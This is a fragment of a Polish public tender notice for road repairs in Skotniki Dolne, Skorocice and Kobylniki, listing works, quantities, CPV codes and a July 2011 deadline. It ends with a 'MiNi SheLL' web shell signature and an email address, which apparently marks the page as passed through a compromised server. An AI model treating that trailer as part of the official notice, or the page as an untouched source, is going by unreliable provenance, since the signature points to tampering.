1.7 Wykonanie przepustu pod koroną drogi z rur o średnicy 50 cm na ławie z kruszywa naturalnego wykonanie naziomu i ścianek prostych prefabrykowanych - 7 m
1.8 Przepusty rurowe pod zjazdami z wykonaniem ławy fundamentowej żwirowej gr.30 cm- rury żelbetowe o średnicy 50 cm - 60 m,
1.9 Górna warstwa z kruszywa łamanego, grubość warstwy po zagęszczeniu 10 cm - 180.00 m2

2. Remont drogi na działce nr 231/1 obręb Skotniki Dolne od km 0+000 do km 0+280 dł.280 mb - zakres obejmuje:
2.1 Koryta wykonywane mechanicznie gł. 15cm w gruncie kat. II-VI na całej szerokości jezdni - 980 m2,
2.2 Warstwy odsączające zagęszczane mechanicznie o gr 10cm- 980 m2,
2.3 Nawierzchnie z kruszywa kamiennego 31,5-63 - warstwa dolna o gr. 15 cm - 980 m2,
2.4 Nawierzchnie z kruszywa kamiennego 0-31,5 - warstwa górna o gr. 10 cm -980 m2,
2.5 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.- 840 m2,
2.6 Utwardzenie poboczy kruszywem kamiennym 0-31,5 obustronnie gr.4 cm - 140 m2,
2.7 Przepusty rurowe pod zjazdami z wykonaniem ławy fundamentowej żwirowej gr.30 cm- rury żelbetowe o średnicy 50 cm - 6 m,
2.8 Ścianki czołowe prefabrykowane dla przepustów o śr.50 cm - 2 szt,
2.9 Górna warstwa z kruszywa łamanego, grubość warstwy po zagęszczeniu 10 cm - 15 m2,
2.10 Kopanie rowu z uzupełnieniem i wyrównaniem poboczy nadmiar ziemi z odwozem do 1 km - 100 m.

3.Remont drogi na działce nr 402 obręb Skotniki Dolne ( Targówka )od km 0+000 do km 0+280 dł.280 mb - zakres obejmuje:
3.1 Koryta wykonywane mechanicznie gł. 15cm w gruncie kat. II-VI na całej szerokości jezdni - 980 m2,
3.2 Warstwy odsączające zagęszczane mechanicznie o gr 10cm - 980 m2,
3.3 Nawierzchnie z kruszywa kamiennego 31,5-63 - warstwa dolna o gr. 15 cm - 980 m2,
3.4 Nawierzchnie z kruszywa kamiennego 0-31,5 - warstwa górna o gr. 10 cm - 980 m2,
3.5 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład.- 840 m2,
3.6 Kopanie rowu z uzupełnieniem i wyrównaniem poboczy nadmiar ziemi z odwozem do 1 km - 85 m,
3.7 Wykonanie przepustu pod koroną drogi z rur o średnicy 50 cm na ławie z kruszywa naturalnego wykonanie naziomu i ścianek prostych prefabrykowanych - 11 m,
3.8 Przepusty rurowe pod zjazdami z wykonaniem ławy fundamentowej żwirowej gr.30 cm- rury żelbetowe o średnicy 50 cm - 7m,
3.9 Górna warstwa z kruszywa łamanego, grubość warstwy po zagęszczeniu 10 cm 15 m2,
3.10 Utwardzenie poboczy kruszywem kamiennym 0-31,5 obustronnie gr.4 cm - 140 m2,
3.11 Umocnienie skarpy płytami ażurowymi prefabrykowanymi - 60 m2.

4. Remont drogi na działce nr 206 obręb Skorocice od km 0+000 do km 0+300 dł.300 mb - zakres obejmuje::
4.1 Koryta wykonywane mechanicznie gł. 25cm w gruncie kat. II-VI na całej szerokości jezdni - 1050 m2,
4.2 Warstwy odsączające zagęszczane mechanicznie o gr 10cm - 1050 m2,
4.3 Nawierzchnie z kruszywa kamiennego 31,5-63 - warstwa dolna o gr. 20 cm - 1050 m2,
4.4 Nawierzchnie z kruszywa kamiennego 0-31,5 - warstwa górna o gr. 10 cm - 1050 m2,
4.5 Nawierzchnie z mieszanek mineralno-asfaltowych standard II, grubość warstwy ścieralnej po zagęszczeniu 4 cm, transport mieszanki samochodami samowyład. - 900 m2,
4.6 Kopanie rowu z uzupełnieniem i wyrównaniem poboczy nadmiar ziemi z odwozem do 1 km - 200 m,
4.7 Utwardzenie poboczy kruszywem kamiennym 0-31,5 obustronnie gr.10 cm - 150 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont drogi na działce nr 375 obręb Kobylniki od km 0+000 do km 0+210 dł.210 mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 2 dotyczy Remontu drogi na działce nr 375 obręb Kobylniki od km 0+000 do km 0+210 dł.210 mb - zakres obejmuje:
1. Koryta wykonywane mechanicznie gł. 15cm w gruncie kat. II-VI na całej szerokości jezdni - 735 m2,
2. Warstwy odsączające zagęszczane mechanicznie o gr 10 cm - 735 m2,
3. Nawierzchnie z kruszywa kamiennego 31,5-63 - warstwa dolna o gr. 20 cm - 735 m2,
4. Nawierzchnie z kruszywa kamiennego 0 -31,5 - warstwa górna o gr. 10 cm - 735 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont drogi na działce nr 443 obręb Kobylniki od km 0+000 do km 0+300 dł.300 mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 3 dotyczy Remontu drogi na działce nr 443 obręb Kobylniki od km 0+000 do km 0+300 dł.300 mb - zakres obejmuje:
1.Koryta wykonywane mechanicznie gł. 15cm w gruncie kat. II-VI na całej szerokości jezdni - 900 m2,
2. Warstwy odsączające zagęszczane mechanicznie o gr 10 cm - 900 m2,
3. Nawierzchnie z kruszywa kamiennego 31,5-63 - warstwa dolna o gr. 20 cm - 900 m2,
4. Nawierzchnie z kruszywa kamiennego 0 -31,5 - warstwa górna o gr. 10 cm - 900 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com